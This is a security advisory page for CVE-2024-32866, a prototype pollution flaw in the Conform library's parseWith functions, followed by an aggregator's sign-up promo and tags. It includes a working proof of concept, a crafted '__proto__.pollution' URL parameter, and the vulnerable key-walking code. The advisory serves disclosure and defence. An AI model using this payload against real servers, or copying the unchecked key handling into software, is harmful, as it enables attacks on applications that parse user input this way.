GHSA-624g-8qjg-8qxf

First published: Tue Apr 23 2024(Updated: )

### Summary Conform allows the parsing of nested objects in the form of `object.property`. Due to an improper implementation of this feature, an attacker can exploit it to trigger prototype pollution by passing a crafted input to `parseWith...` functions. ### PoC ```javascript const { parseWithZod } = require('@conform-to/zod'); const { z } = require("zod"); const param = new URLSearchParams("__proto__.pollution=polluted"); const schema = z.object({ "a": z.string() }); parseWithZod(param, { schema }); console.log("pollution:", ({}).pollution); // should print "polluted" ``` ### Details The invocation of the `parseWithZod` function in the above PoC triggers the `setValue` function through `getSubmissionContext` and `parse`, executing the following process, resulting in prototype pollution: ```javascript let pointer = value; pointer.__proto__ = pointer.__proto__; pointer = pointer.__proto__; pointer.polluted = "polluted"; ``` This is caused by the lack of object existence checking on [line 117 in formdata.ts](https://github.com/edmundhung/conform/blob/59156d7115a7207fa3b6f8a70a4342a9b24c2501/packages/conform-dom/formdata.ts#L117), where the code only checks for the presence of `pointer[key]` without proper validation. ### Impact Applications that use conform for server-side validation of form data or URL parameters are affected by this vulnerability.

Never miss a vulnerability like this again

Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.

Read MoreStart Free Trial

• agent/softwarecombine
• agent/severity
• agent/weakness
• agent/first-publish-date
• agent/event
• agent/type
• agent/description
• collector/github-advisory-latest
• source/GitHub
• alias/GHSA-624g-8qjg-8qxf
• alias/CVE-2024-32866
• agent/software-canonical-lookup
• agent/references
• agent/last-modified-date
• agent/tags
• collector/github-advisory
• package-manager/npm